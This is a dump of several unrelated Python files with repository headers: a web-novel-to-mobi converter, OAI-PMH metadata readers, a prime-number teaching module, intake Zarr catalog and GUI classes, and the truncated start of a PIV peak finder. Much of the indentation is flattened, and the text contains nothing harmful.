import shlex
import subprocess
import shutil
from jinja2 import Environment, FileSystemLoader
import pprint
from collections import deque
class Publishers(Enum):
narou = dict(
name = u'小説家になろう',
url = u'http://ncode.syosetu.com/',
api = u'http://api.syosetu.com/novelapi/api/',
ncode_pattern = r'n\d{4}\w{1,2}',
meta_list_valid_length = 2
)
hameln = dict(
name = u'ハーメルン',
url = u'https://novel.syosetu.org/',
ncode_pattern = r'',
meta_list_valid_length = 2
)
kakuyomu = dict(
name = u'カクヨム',
url = u'https://kakuyomu.jp/',
ncode_pattern = r'\d{11,}',
meta_list_valid_length = 2
)
def url(self):
return self.value['url']
def api(self):
return self.value['api']
def pattern(self):
return self.value['ncode_pattern']
def valid_length(self):
return self.value['meta_list_valid_length']
# TODO: multi-user support?
class WebNovel:
def __init__(self, url):
        # TODO: reset this counter once __download_image() is done with it
        self.image_count = 1  # used only by __download_image()
self.__judge_publisher(url)
self.__get_meta()
def is_serial_story(self):
return self.meta['serial_story_flag']
def get_ncode(self):
return self.ncode
def get_publisher(self):
return self.publisher
    # TODO: add a wrapper method for validation: append the path argument, run normpath(), then validate
def get_novel_path(self):
return self.novel_path + '/'
def get_output_name(self):
return self.meta['output_name']
# TODO: validate
def get_base_path(self):
return self.base_path + '/'
def get_title(self):
return self.meta['title']
def get_episode(self):
return self.meta['episode']
def get_writer(self):
return self.meta['writer']
def get_last_posted(self):
return self.meta['last_posted']
def get_updated(self):
return self.meta['updated']
def get_mobi(self, is_force):
self.download(is_force)
self.format()
return self.convert()
def download(self, is_force):
self.__make_html_dir(is_force)
if self.get_publisher() == 'narou':
dirs = self.__gen_output_dirs()
for d in dirs:
path = self.get_novel_path() + 'html/' + d + 'index.html'
url = Publishers.narou.url() + self.get_ncode() + '/' + d
self.__download_file(url, path)
def format(self):
self.__print_message('Format', self.get_novel_path() + 'html/')
self.__make_tmp_dir()
dirs = self.__gen_output_dirs()
for d in dirs:
if d:
self.__format_episode(d)
else:
self.__format_index()
# TODO: validate
    # TODO: use the novel title as the file name
def convert(self):
self.__print_message('Convert', self.get_novel_path() + 'tmp/')
kindlegen = self.get_base_path() + 'bin/kindlegen'
opf = self.get_novel_path() + 'tmp/content.opf'
# opf = shlex.quote(self.get_novel_path() + 'tmp/content.opf')
output = shlex.quote(self.get_output_name())
cmd = [kindlegen, opf, '-verbose', '-locale', 'en', '-o', output]
# subprocess.run(cmd)
subprocess.run(cmd, stdout=subprocess.DEVNULL)
mobi = self.get_novel_path() + 'tmp/' + output
try:
return shutil.move(mobi, self.get_novel_path())
except shutil.Error:
os.remove(self.get_novel_path() + output)
return shutil.move(mobi, self.get_novel_path())
def is_nested_list(self, obj):
is_nested = False
if isinstance(obj, list):
for val in obj:
is_nested |= isinstance(val, list)
return is_nested
def worship_jinja(self, tpl_name, context, create_path):
loader = FileSystemLoader(self.get_base_path() + 'template/', encoding='utf8')
env = Environment(loader=loader, trim_blocks=True, autoescape=True)
tpl = env.get_template(tpl_name)
output = tpl.render(context)
self.__print_message('Create', create_path)
with open(create_path, 'wb') as f:
f.write(output.encode())
def print_meta_json(self):
string = json.dumps({
'path': os.path.normpath(self.get_novel_path() + self.get_output_name()),
'publisher': Publishers[self.get_publisher()].value['name'],
'title': self.get_title(),
'writer': self.get_writer(),
'ncode': self.get_ncode(),
'episode': self.get_episode(),
'last_posted': self.get_last_posted(),
'updated': self.get_updated(),
'status': 'Success'
})
print(string)
def __judge_publisher(self, url):
for publisher in Publishers:
pattern = r'^' + publisher.url()
if re.match(pattern, url): # if URL is valid
pattern = publisher.pattern()
match = re.search(pattern, url)
if match and isinstance(match.group(), str): # if ncode is valid
self.publisher = publisher.name
self.ncode = match.group()
domain = re.sub(r'^https?://', '', publisher.url())
path = 'cache/' + domain + self.get_ncode() + '/'
base = os.path.dirname(os.path.relpath(__file__))
self.base_path = os.path.normpath(base)
self.novel_path = os.path.normpath(os.path.join(base, path))
break
else:
                    raise RuntimeError('Ncode is invalid')
else:
raise RuntimeError('Publisher NOT Exist')
def __get_meta(self):
if not hasattr(self, 'meta'):
if self.get_publisher() == 'narou':
narou = Publishers.narou
params={'ncode': self.get_ncode(), 'out': 'json'}
response = requests.get(narou.api(), params)
meta = json.loads(response.text)
if len(meta) == narou.valid_length():
meta = meta[1]
self.meta = {}
self.meta['title'] = meta['title']
self.meta['writer'] = meta['writer']
self.meta['episode'] = meta['general_all_no']
self.meta['last_posted'] = meta['general_lastup']
self.meta['updated'] = meta['novelupdated_at']
self.meta['serial_story_flag'] = (meta['novel_type'] == 1)
self.meta['output_name'] = self.get_ncode() + '.mobi'
# self.meta['output_name'] = self.get_title() + '.mobi'
else:
raise RuntimeError('Novel NOT Exist')
# TODO: validation
def __make_html_dir(self, is_force):
dirs = self.__gen_output_dirs()
try:
os.makedirs(self.get_novel_path())
except FileExistsError:
if is_force:
shutil.rmtree(self.get_novel_path())
os.makedirs(self.get_novel_path())
else:
raise FileExistsError
for d in dirs:
os.makedirs(self.get_novel_path() + 'html/' + d)
def __make_tmp_dir(self):
        # TODO: the copied files should be listed explicitly; files could get swapped out, but this is tedious, so low priority
try:
common = self.get_base_path() + 'common/'
tmp = self.get_novel_path() + 'tmp/'
shutil.copytree(common, tmp)
except FileExistsError:
            # TODO: delete and copy again?
pass
def __parse_narou_index(self, soup):
toc = list()
index = soup.find(class_='index_box')
for child in index.children:
if not child.string == '\n':
if 'chapter_title' in child['class']:
toc.append(child.string)
toc.append(list()) # subtitle list
elif 'novel_sublist2' in child['class']:
if toc and isinstance(toc[-1], list):
toc[-1].append(child.a.string)
else:
toc.append(child.a.string)
return toc
def __parse_other_index(self, soup):
toc = list()
return toc
def __format_episode(self, ep):
read_path = self.get_novel_path() + 'html/' + ep + 'index.html'
soup = self.__read_html(read_path)
if self.get_publisher() == 'narou':
subtitle, paragraphs = self.__parse_narou_episode(soup)
        else:  # TODO: other novel hosting sites
subtitle, paragraphs = self.__parse_other_episode(soup)
context = dict(
title = subtitle,
pars = paragraphs
)
create_path = self.get_novel_path() + 'tmp/xhtml/' + str(ep).replace('/', '') + '.xhtml'
self.worship_jinja('episode.tpl.xhtml', context, create_path)
def __parse_narou_episode(self, soup):
text = soup.find(id='novel_honbun')
subtitle = soup.find(class_='novel_subtitle').string
imgs = text.find_all('img')
urls = [img['src'] for img in imgs]
paths = self.__download_images(urls)
queue = deque(paths)
        # TODO: pars contains raw tags, so it cannot be escaped inside the template
        # parse html (this block is messy)
        # TODO: support forewords and afterwords
pars = []
pre_is_br = False
for child in text.children:
if isinstance(child, Tag): # strip wrapper tag from novel context
if child.name == 'p': # if tag contains text like serif, land-sentence
buf = ''
for c in child:
buf += str(c)
pars.append(re.sub(r'^ ', '', buf))
if isinstance(child, NavigableString) and not str(child) == '\n':
pars.append(re.sub(r'^\n?\u3000?', '', str(child)))
pre_is_br = False
elif isinstance(child, Tag):
if child.name == 'br':
if pre_is_br:
pars.append('<br />')
else:
pre_is_br = True
return subtitle, pars
def __parse_other_episode(self, soup):
raise RuntimeError('This publisher is NOT supported')
def __format_index(self):
path = self.get_novel_path() + 'html/index.html'
soup = self.__read_html(path)
if self.is_serial_story():
if self.get_publisher() == 'narou':
toc = self.__parse_narou_index(soup)
else:
                toc = self.__parse_other_index(soup)  # TODO: other novel hosting sites
self.__create_navigation(toc) # create navigation-documents.xhtml
self.__create_toc(toc) # create toc.xhtml
else: # if short story
raise RuntimeError('Short story is NOT supported')
self.__create_titlepage() # create titlepage.xhtml
self.__create_opf() # create content.opf
def __create_navigation(self, toc):
context = dict(
toc = toc
)
path = self.get_novel_path() + 'tmp/navigation-documents.xhtml'
if self.is_nested_list(toc):
tpl_path = 'navigation-documents/some-chapters.tpl.xhtml'
else:
tpl_path = 'navigation-documents/no-chapters.tpl.xhtml'
self.worship_jinja(tpl_path, context, path)
def __create_toc(self, toc):
context = dict(
toc = toc,
title = self.get_title()
)
path = self.get_novel_path() + 'tmp/xhtml/toc.xhtml'
if self.is_nested_list(toc):
tpl_path = 'toc/some-chapters.tpl.xhtml'
else:
tpl_path = 'toc/no-chapters.tpl.xhtml'
self.worship_jinja(tpl_path, context, path)
def __create_titlepage(self):
context = dict(
title = self.get_title(),
writer = self.get_writer()
)
path = self.get_novel_path() + 'tmp/xhtml/titlepage.xhtml'
self.worship_jinja('titlepage.tpl.xhtml', context, path)
def __create_opf(self):
context = dict(
title = self.get_title(),
writer = self.get_writer(),
publisher = self.get_publisher(),
episode = self.get_episode()
)
path = self.get_novel_path() + 'tmp/content.opf'
self.worship_jinja('content.tpl.opf', context, path)
def __download_images(self, urls):
paths = []
for url in urls:
            url = re.sub(r'^//', "http://", url)  # normalize protocol-relative URLs
path = self.get_novel_path() + 'tmp/image/' + str(self.image_count) + '.jpg'
paths.append('../image/' + str(self.image_count) + '.jpg')
self.__download_file(url, path)
self.image_count += 1
return paths
def __download_file(self, url, path):
self.__print_message('Download', url)
headers = {
'Host': 'ncode.syosetu.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'ja,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Upgrade-Insecure-Requests': '1'
}
response = requests.get(url, headers=headers)
with open(path, 'wb') as f:
f.write(response.content)
def __read_html(self, path):
with open(path, 'rb') as f:
html = f.read()
return BeautifulSoup(html, 'html.parser')
def __gen_output_dirs(self):
dirs = [''] # '' mean './'
if self.is_serial_story():
last = self.get_episode() + 1
dirs += [str(ep) + '/' for ep in range(1, last)]
return dirs
def __print_message(self, verb, obj):
pass
# print('%-8s:' % verb, obj)
def get(url, is_force):
novel = WebNovel(url)
novel.get_mobi(is_force)
def get_json(url, is_force):
novel = WebNovel(url)
try:
novel.get_mobi(is_force)
novel.print_meta_json()
except FileExistsError:
print(json.dumps({'status': 'FileExistsError'}))
def download(url):
narou = WebNovel(url)
    narou.download(is_force=False)
def convert(url):
narou = WebNovel(url)
narou.convert()
def print_usage():
print("Usage: $ python narou.py [command]")
print(" - get [url] [--force]")
print(" - get_json [url] [--force]")
print(" - download [url]")
print(" - format [url]")
print(" - convert [url]")
# print(" - update [url]")
sys.exit(1)
def main():
argvs = sys.argv
argc = len(argvs)
if argc != 3 and argc != 4:
print_usage()
else:
cmd = argvs[1]
url = argvs[2]
# TODO: argparse
try:
opt = argvs[3]
except:
opt = ''
if cmd == 'get':
get(url, is_force=True)
elif cmd == 'download':
download(url)
elif cmd == 'format':
            WebNovel(url).format()
elif cmd == 'convert':
convert(url)
elif cmd == 'get_json':
if opt == '--force':
get_json(url, is_force=True)
else:
get_json(url, is_force=False)
else:
print_usage()
if __name__ == '__main__':
main()
``` |
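A usage sketch for the script above. The ncode in the URL is a placeholder, and the run assumes the `bin/kindlegen`, `template/` and `common/` directories the script expects exist next to it.
```python
# programmatic use (placeholder ncode)
novel = WebNovel('http://ncode.syosetu.com/n1234ab/')
mobi_path = novel.get_mobi(is_force=True)   # download -> format -> convert
novel.print_meta_json()
# equivalent command line:
#   $ python webnovel.py get_json http://ncode.syosetu.com/n1234ab/ --force
```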
{
"source": "jr3cermak/robs-kitchensink",
"score": 3
} |
#### File: src/oaipmh/metadata.py
```python
from lxml import etree
from lxml.etree import SubElement
from oaipmh import common
class MetadataRegistry(object):
"""A registry that contains readers and writers of metadata.
a reader is a function that takes a chunk of (parsed) XML and
returns a metadata object.
    a writer is a function that takes a metadata object and
produces a chunk of XML in the right format for this metadata.
"""
def __init__(self):
self._readers = {}
self._writers = {}
def registerReader(self, metadata_prefix, reader):
self._readers[metadata_prefix] = reader
def registerWriter(self, metadata_prefix, writer):
self._writers[metadata_prefix] = writer
def hasReader(self, metadata_prefix):
return metadata_prefix in self._readers
def hasWriter(self, metadata_prefix):
return metadata_prefix in self._writers
def readMetadata(self, metadata_prefix, element):
"""Turn XML into metadata object.
element - element to read in
returns - metadata object
"""
return self._readers[metadata_prefix](element)
def writeMetadata(self, metadata_prefix, element, metadata):
"""Write metadata as XML.
element - ElementTree element to write under
metadata - metadata object to write
"""
self._writers[metadata_prefix](element, metadata)
global_metadata_registry = MetadataRegistry()
class Error(Exception):
pass
class MetadataReader(object):
"""A default implementation of a reader based on fields.
"""
def __init__(self, fields, namespaces=None):
self._fields = fields
self._namespaces = namespaces or {}
def __call__(self, element):
map = {}
# create XPathEvaluator for this element
xpath_evaluator = etree.XPathEvaluator(element,
namespaces=self._namespaces)
e = xpath_evaluator.evaluate
        # now extract field info according to xpath expr
for field_name, (field_type, expr) in self._fields.items():
if field_type == 'bytes':
value = str(e(expr))
elif field_type == 'bytesList':
value = [str(item) for item in e(expr)]
elif field_type == 'text':
# make sure we get back unicode strings instead
# of lxml.etree._ElementUnicodeResult objects.
value = unicode(e(expr))
elif field_type == 'textList':
# make sure we get back unicode strings instead
# of lxml.etree._ElementUnicodeResult objects.
value = [unicode(v) for v in e(expr)]
else:
                raise Error("Unknown field type: %s" % field_type)
map[field_name] = value
return common.Metadata(map)
oai_dc_reader = MetadataReader(
fields={
'title': ('textList', 'oai_dc:dc/dc:title/text()'),
'creator': ('textList', 'oai_dc:dc/dc:creator/text()'),
'subject': ('textList', 'oai_dc:dc/dc:subject/text()'),
'description': ('textList', 'oai_dc:dc/dc:description/text()'),
'publisher': ('textList', 'oai_dc:dc/dc:publisher/text()'),
'contributor': ('textList', 'oai_dc:dc/dc:contributor/text()'),
'date': ('textList', 'oai_dc:dc/dc:date/text()'),
'type': ('textList', 'oai_dc:dc/dc:type/text()'),
'format': ('textList', 'oai_dc:dc/dc:format/text()'),
'identifier': ('textList', 'oai_dc:dc/dc:identifier/text()'),
'source': ('textList', 'oai_dc:dc/dc:source/text()'),
'language': ('textList', 'oai_dc:dc/dc:language/text()'),
'relation': ('textList', 'oai_dc:dc/dc:relation/text()'),
'coverage': ('textList', 'oai_dc:dc/dc:coverage/text()'),
'rights': ('textList', 'oai_dc:dc/dc:rights/text()')
},
namespaces={
'oai_dc': 'http://www.openarchives.org/OAI/2.0/oai_dc/',
'dc' : 'http://purl.org/dc/elements/1.1/'}
)
oai_iso19139_reader = MetadataReader(
fields={
'title': ('textList', 'gmd:MD_Metadata/gmd:identificationInfo/gmd:MD_DataIdentification/gmd:citation/gmd:CI_Citation/gmd:title/gco:CharacterString/text()')
},
namespaces={
'gmd': 'http://www.isotc211.org/2005/gmd',
'gts': 'http://www.isotc211.org/2005/gts',
'gco': 'http://www.isotc211.org/2005/gco',
'gml': 'http://www.opengis.net/gml',
'geonet': 'http://www.fao.org/geonetwork'}
)
# mets uses: xmlns="http://www.loc.gov/METS/"
# Since it is in the default namespace, we have remap each element
# into its own namespace: mets (requirement of lxml & etree)
# ORIG: mets/dmdSec/mdWrap/xmlData/mods:mods/mods:titleInfo/mods:title
# USE : mets:mets/mets:dmdSec/mets:mdWrap/mets:xmlData/mods:mods/mods:titleInfo/mods:title
oai_mets_reader = MetadataReader(
fields={
'title': ('textList', 'mets:mets/mets:dmdSec/mets:mdWrap/mets:xmlData/mods:mods/mods:titleInfo/mods:title/text()')
},
namespaces={
'mets': 'http://www.loc.gov/METS/',
'mods': 'http://www.loc.gov/mods/v3'}
)
oai_ore_reader = MetadataReader(
fields={
'title': ('textList', 'atom:entry/atom:title/text()')
},
namespaces={
'atom': 'http://www.w3.org/2005/Atom',
'ore': 'http://www.openarchives.org/ore/terms/',
'oreatom': 'http://www.openarchives.org/ore/atom/',
'dcterms': 'http://purl.org/dc/terms/'}
)
oai_qdc_reader = MetadataReader(
fields={
'title': ('textList', 'qdc:qualifieddc/dc:title/text()')
},
namespaces={
'dc': 'http://purl.org/dc/elements/1.1/',
'dcterms': 'http://purl.org/dc/terms/',
'qdc': 'http://epubs.cclrc.ac.uk/xmlns/qdc/'}
)
oai_rdf_reader = MetadataReader(
fields={
'title': ('textList', 'rdf:RDF/ow:Publication/dc:title/text()')
},
namespaces={
'rdf': 'http://www.w3.org/1999/02/22-rdf-syntax-ns#',
'ow': 'http://www.ontoweb.org/ontology/1#',
'dc': 'http://purl.org/dc/elements/1.1/',
'ds': 'http://dspace.org/ds/elements/1.1/'}
)
``` |
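A short sketch of wiring the registry and the `oai_dc` reader together. The XML below is a minimal stand-in for the `<metadata>` payload of an OAI-PMH record; it assumes the `Metadata` helper in `oaipmh.common` exposes `getField` as in upstream pyoai, and it follows the Python 2 environment that the module's use of `unicode` implies.
```python
from lxml import etree
registry = MetadataRegistry()
registry.registerReader('oai_dc', oai_dc_reader)
# minimal stand-in for an OAI-PMH <metadata> element
xml = b'''<metadata xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
                    xmlns:dc="http://purl.org/dc/elements/1.1/">
  <oai_dc:dc><dc:title>Example record</dc:title></oai_dc:dc>
</metadata>'''
element = etree.fromstring(xml)
metadata = registry.readMetadata('oai_dc', element)
print(metadata.getField('title'))   # ['Example record']
```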
{
"source": "jr6321/810_examples",
"score": 4
} |
#### File: jr6321/810_examples/primes.py
```python
import unittest
import time
def next_prime():
""" generate prime numbers but store the primes you've generated so far and compare
new potential primes only against the list of generated primes.
"""
primes = [2]
yield 2 # 2 is the first prime number by definition
cur = 3 # cur is the next number to be checked
while True: # potentially generate an infinite number of primes
for p in primes:
#print('checking {} % {}'.format(cur, p))
if cur % p == 0:
break
else:
# exhausted all of the primes and found another prime number
primes.append(cur)
yield cur
cur += 1
def next_prime_naive():
""" generate prime numbers by dividing by 2 up to the number """
cur = 2
while True: # potentially generate an infinite number of primes
for i in range(2, cur):
#print('checking {} % {}'.format(cur, i))
if cur % i == 0:
break # cur is divisible by i so look at next value of cur
else:
# didn't divide evenly by any number so found another prime number
yield cur
cur += 1
def nprimes_naive(n):
""" return a list with the first n prime numbers """
gen = next_prime_naive()
return [next(gen) for i in range(n)]
def prime_naive_comparisons(n):
""" generate prime numbers by comparing up to cur // 2 + 1 """
comparisons = 0
cur = 2
for m in range(n):
for i in range(2, cur):
#print("{}: comparing {} and {}".format(comparisons, cur, i))
comparisons += 1
if cur % i == 0:
break # cur is divisible by i so look at next value of cur
# didn't divide evenly by any number so found another prime number
cur += 1
return comparisons
def prime_comparisons(n):
""" generate prime numbers by comparing up to cur // 2 + 1 """
comparisons = 0
primes = [2]
cur = 3 # cur is the next number to be checked
for i in range(n):
for p in primes:
comparisons += 1
if cur % p == 0:
break
else:
# exhausted all of the primes and found another prime number
primes.append(cur)
cur += 1
return comparisons
def is_prime(n):
""" return True/False if n is prime """
for p in next_prime():
if p == n:
return True
elif p > n:
return False
def nth_prime(n):
""" return the nth prime number """
for i, p in enumerate(next_prime()):
if i + 1 >= n:
return p
def nth_prime_naive(n):
""" return the nth prime number using next_prime2(), not next_prime() """
for i, p in enumerate(next_prime_naive()):
if i + 1 >= n:
return p
class PrimeTest(unittest.TestCase):
def test(self):
self.assertEqual(nprimes_naive(5), [2, 3, 5, 7, 11])
self.assertEqual(nth_prime(1), 2)
self.assertEqual(nth_prime(2), 3)
self.assertEqual(nth_prime(5), 11)
self.assertEqual(nth_prime_naive(1), 2)
self.assertEqual(nth_prime_naive(2), 3)
self.assertEqual(nth_prime_naive(5), 11)
def time_nprimes_naive(n):
gen = next_prime_naive()
start = time.time()
for i in range(n):
next(gen)
end = time.time()
print("{}: {:.5f}".format(n, end - start))
def time_nprimes(n):
comparisons = prime_comparisons(n)
gen = next_prime()
start = time.time()
for i in range(n):
next(gen)
end = time.time()
print("better: {}: {} comparisons {:.5f} seconds".format(n, comparisons, end - start))
def timeit(func, *args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
end = time.time()
return result, end - start
def compare_times(n):
nth_result, nth_secs = timeit(nth_prime, n)
    nth2_result, nth2_secs = timeit(nth_prime_naive, n)
    if nth_secs < nth2_secs:
        print("nth_prime({0}) beat nth_prime_naive({0}) by {1:.5} seconds".format(n, nth2_secs - nth_secs))
    else:
        print("nth_prime_naive({0}) beat nth_prime({0}) by {1:.5} seconds".format(n, nth_secs - nth2_secs))
if __name__ == "__main__":
#unittest.main()
print("finding 10 primes requires {} comparisons".format(prime_naive_comparisons(13)))
#print("finding 100 primes requires {} comparisons".format(prime_naive_comparisons(100)))
time_nprimes_naive(100)
print("finding 200 primes requires {} comparisons".format(prime_naive_comparisons(200)))
time_nprimes_naive(200)
print("finding 400 primes requires {} comparisons".format(prime_naive_comparisons(400)))
time_nprimes_naive(400)
print("finding 800 primes requires {} comparisons".format(prime_naive_comparisons(800)))
#time_nprimes_naive(800)
time_nprimes(100)
time_nprimes(200)
time_nprimes(400)
time_nprimes(800)
#print(nth_prime(1000))
#print(nth_prime(1500))
#print(nprimes(1000))
"""
compare_times(10)
compare_times(1000)
compare_times(2500)
"""
``` |
{
"source": "j-r77/intake",
"score": 2
} |
#### File: intake/catalog/zarr.py
```python
from .base import Catalog
from .local import LocalCatalogEntry
from ..source import register_driver
class ZarrGroupCatalog(Catalog):
"""A catalog of the members of a Zarr group."""
version = '0.0.1'
container = 'catalog'
partition_access = None
name = 'zarr_cat'
def __init__(self, urlpath, storage_options=None, component=None, metadata=None,
consolidated=False):
"""
Parameters
----------
urlpath : str
Location of data file(s), possibly including protocol information
storage_options : dict, optional
Passed on to storage backend for remote files
component : str, optional
If None, build a catalog from the root group. If given, build the
catalog from the group at this location in the hierarchy.
metadata : dict, optional
Catalog metadata. If not provided, will be populated from Zarr
group attributes.
consolidated : bool, optional
If True, assume Zarr metadata has been consolidated.
"""
self._urlpath = urlpath
self._storage_options = storage_options or {}
self._component = component
self._consolidated = consolidated
self._grp = None
super().__init__(metadata=metadata)
def _load(self):
import zarr
if self._grp is None:
# obtain the zarr root group
if isinstance(self._urlpath, zarr.hierarchy.Group):
# use already-opened group, allows support for nested groups
# as catalogs
root = self._urlpath
else:
# obtain store
if isinstance(self._urlpath, str):
# open store from url
from fsspec import get_mapper
store = get_mapper(self._urlpath, **self._storage_options)
else:
# assume store passed directly
store = self._urlpath
# open root group
if self._consolidated:
# use consolidated metadata
root = zarr.open_consolidated(store=store, mode='r')
else:
root = zarr.open_group(store=store, mode='r')
# deal with component path
if self._component is None:
self._grp = root
else:
self._grp = root[self._component]
# use zarr attributes as metadata
self.metadata.update(self._grp.attrs.asdict())
# build catalog entries
entries = {}
for k, v in self._grp.items():
if isinstance(v, zarr.core.Array):
entry = LocalCatalogEntry(name=k,
description='',
driver='ndzarr',
args=dict(urlpath=v),
catalog=self)
else:
entry = LocalCatalogEntry(name=k,
description='',
driver='zarr_cat',
args=dict(urlpath=v))
entries[k] = entry
self._entries = entries
def to_zarr(self):
return self._grp
```
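A hedged usage sketch for the catalog above. The store path and the `temperature` member are placeholders; `consolidated=True` only applies if `zarr.consolidate_metadata` was run on the store beforehand.
```python
# placeholder path to a Zarr group (a local directory or any fsspec URL)
cat = ZarrGroupCatalog('data/example.zarr', consolidated=False)
print(list(cat))                 # arrays appear as 'ndzarr' entries, subgroups as nested catalogs
arr = cat['temperature'].read()  # hypothetical member array
```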
#### File: gui/source/gui.py
```python
from functools import partial
import panel as pn
from intake.utils import remake_instance
from ..base import Base, enable_widget, MAX_WIDTH
from .select import SourceSelector
from .defined_plots import Plots
from .description import Description
class SourceGUI(Base):
"""
Top level GUI panel that contains controls and all visible sub-panels
This class is responsible for coordinating the inputs and outputs
    of various sub-panels and their effects on each other.
Parameters
----------
cats: list of catalogs, opt
        catalogs used to initialize, provided as objects.
sources: list of sources, opt
        sources used to initialize, provided as objects.
done_callback: func, opt
called when the object's main job has completed. In this case,
selecting source(s).
Attributes
----------
children: list of panel objects
children that will be used to populate the panel when visible
panel: panel layout object
instance of a panel layout (row or column) that contains children
when visible
watchers: list of param watchers
watchers that are set on children - cleaned up when visible
is set to false.
"""
def __init__(self, cats=None, sources=None, done_callback=None, **kwargs):
self._cats = cats
self._sources = sources
self.panel = pn.Column(name='Entries', width_policy='max',
max_width=MAX_WIDTH)
self.done_callback = done_callback
self.plot_widget = pn.widgets.Toggle(
name='📊',
value=False,
disabled=True,
width=50)
self.pars_widget = pn.widgets.Toggle(
name='⚙',
value=False,
disabled=True,
width=50)
self.controls = [self.plot_widget, self.pars_widget]
self.control_panel = pn.Row(name='Controls', margin=0)
self.pars_editor = ParsEditor()
self.select = SourceSelector(cats=self._cats,
sources=self._sources,
done_callback=self.callback)
self.description = Description()
self.description.source = self.sources
self.plot = Plots(source=self.source_instance,
visible=self.plot_widget.value,
visible_callback=partial(
setattr, self.plot_widget, 'value'))
super().__init__(**kwargs)
def _setup_watchers(self):
self.watchers = [
self.plot_widget.param.watch(self.on_click_plot_widget, 'value'),
self.pars_widget.param.watch(self.on_click_pars_widget, 'value'),
self.select.widget.link(self.description, value='source'),
]
def setup(self):
self._setup_watchers()
self.children = [
pn.Column(
pn.Row(
pn.Column(
self.select.panel,
self.control_panel,
margin=0,
),
self.description.panel,
margin=0,
),
self.plot.panel,
margin=0,
width_policy='max'
)
]
@Base.visible.setter
def visible(self, visible):
"""When visible changed, do setup or unwatch and call visible_callback"""
self._visible = visible
if visible and len(self._panel.objects) == 0:
self.setup()
self.select.visible = True
self.description.visible = True
if len(self.control_panel.objects) == 0:
self.control_panel.extend(self.controls)
self._panel.extend(self.children)
elif not visible and len(self._panel.objects) > 0:
self.unwatch()
# do children
self.select.visible = False
self.control_panel.clear()
self.description.visible = False
self.plot.visible = False
self._panel.clear()
if self.visible_callback:
self.visible_callback(visible)
def callback(self, sources):
"""When a source is selected, enable widgets that depend on that condition
and do done_callback"""
if hasattr(self, 'plot'):
# guard since this cannot happen until plot is ready
self.plot.visible = False
enable = bool(sources)
self.plot_widget.value = False
self.pars_widget.value = False
enable_widget(self.plot_widget, enable)
enable_widget(self.pars_widget, enable and sources[0]._user_parameters)
self.pars_editor.dirty = True # reset pars editor
if self.done_callback:
self.done_callback(sources)
def on_click_plot_widget(self, event):
""" When the plot control is toggled, set visibility and hand down source"""
self.plot.source = self.source_instance
self.plot.visible = event.new
def on_click_pars_widget(self, event):
if event.new:
pars = self.sources[0]._user_parameters
self.pars_editor.remake(pars)
self.description.panel.append(self.pars_editor.panel)
else:
self.description.panel.remove(self.pars_editor.panel)
@property
def sources(self):
"""Sources that have been selected from the source GUI"""
return self.select.selected
@property
def source_instance(self):
"""DataSource from the current selection using current parameters"""
sel = self.select.selected
args = self.pars_editor.kwargs
if sel:
return sel[0](**args)
def __getstate__(self):
"""Serialize the current state of the object"""
return {
'visible': self.visible,
'select': self.select.__getstate__(),
'description': self.description.__getstate__(include_source=False),
'plot': self.plot.__getstate__(include_source=False),
}
def __setstate__(self, state):
"""Set the current state of the object from the serialized version.
Works inplace. See ``__getstate__`` to get serialized version and
``from_state`` to create a new object."""
self.visible = state.get('visible', True)
if self.visible:
self.select.__setstate__(state['select'])
self.description.__setstate__(state['description'])
self.plot.__setstate__(state['plot'])
return self
@classmethod
def from_state(cls, state):
"""Create a new object from a serialized exising object.
Example
-------
original = SourceGUI()
copy = SourceGUI.from_state(original.__getstate__())
"""
return cls(cats=[], sources=[]).__setstate__(state)
class ParsEditor(Base):
"""Edit user parameters using widgets"""
def __init__(self):
self.panel = pn.Column(pn.Spacer())
self.dirty = True # don't use kwargs until source is set
def remake(self, upars):
"""Set up parameter widgets for given list of UserParameter objects"""
self.panel.clear()
for upar in upars:
self.panel.append(self.par_to_widget(upar))
self.dirty = False
@property
def kwargs(self):
"""The current selections"""
if self.dirty:
return {}
else:
return {w.name: w.value for w in self.panel}
@staticmethod
def par_to_widget(par):
if par.allowed:
w = pn.widgets.Select(options=par.allowed)
elif par.type in ['str', 'unicode']:
w = pn.widgets.TextInput()
elif par.type == 'int':
w = pn.widgets.IntSlider(start=par.min, end=par.max, step=1)
elif par.type == 'float':
w = pn.widgets.FloatSlider(start=par.min, end=par.max)
elif par.type == 'datetime':
w = pn.widgets.DatetimeInput()
else:
w = pn.widgets.LiteralInput()
w.name = par.name
w.value = par.default
return w
``` |
{
"source": "jr7/pypiv",
"score": 3
} |
#### File: pypiv/piv/peak_detection.py
```python
import numpy as np
import numpy.linalg as nl
def find_peak(corr, method='gaussian'):
"""Peak detection algorithm switch
    After loading the correlation window a maximum finder is invoked.
    The correlation window is cut down to the necessary 9 points around the maximum.
    Afterwards the maximum is checked not to be close to the border of the correlation frame.
    This cropped window is used along with the chosen method to interpolate the sub pixel shift.
    Each interpolation method returns a tuple with the sub pixel shift in x and y direction.
    The maximum's position and the sub pixel shift are added and returned.
    If an error occurs during the sub pixel interpolation the shift is set to nan.
    Also if the interpolation method is unknown an exception is thrown.
:param corr: correlation window
:param method: peak finder algorithm (gaussian, centroid, parabolic, 9point)
:raises: Sub pixel interpolation method not found
:returns: shift in interrogation window
"""
i, j = np.unravel_index(corr.argmax(), corr.shape)
if check_peak_position(corr, i, j) is False:
return np.nan, np.nan
window = corr[i-1:i+2, j-1:j+2]
if method == 'gaussian':
subpixel_interpolation = gaussian
elif method == 'centroid':
subpixel_interpolation = centroid
elif method == 'parabolic':
subpixel_interpolation = parabolic
elif method == '9point':
subpixel_interpolation = gaussian2D
else:
raise Exception('Sub pixel interpolation method not found!')
try:
dx, dy = subpixel_interpolation(window)
except:
return np.nan, np.nan
else:
return (i + dx, j + dy)
def check_peak_position(corr, i, j):
"""Checking weather the maximum is at the boarder of the correlation window
:param corr: correlation window
:param i: first index position of the maximum
:param j: second index position of the maximum
:returns: true if maximum is inside the correlation window
"""
dist = 3
li, lj = corr.shape
i_inside = (i >= dist) & (i < li - dist)
j_inside = (j >= dist) & (j < lj - dist)
if i_inside and j_inside:
return True
else:
return False
def gaussian(window):
"""Gaussian interpolation for sub pixel shift"""
ip = lambda x : (np.log(x[0]) - np.log(x[2]))\
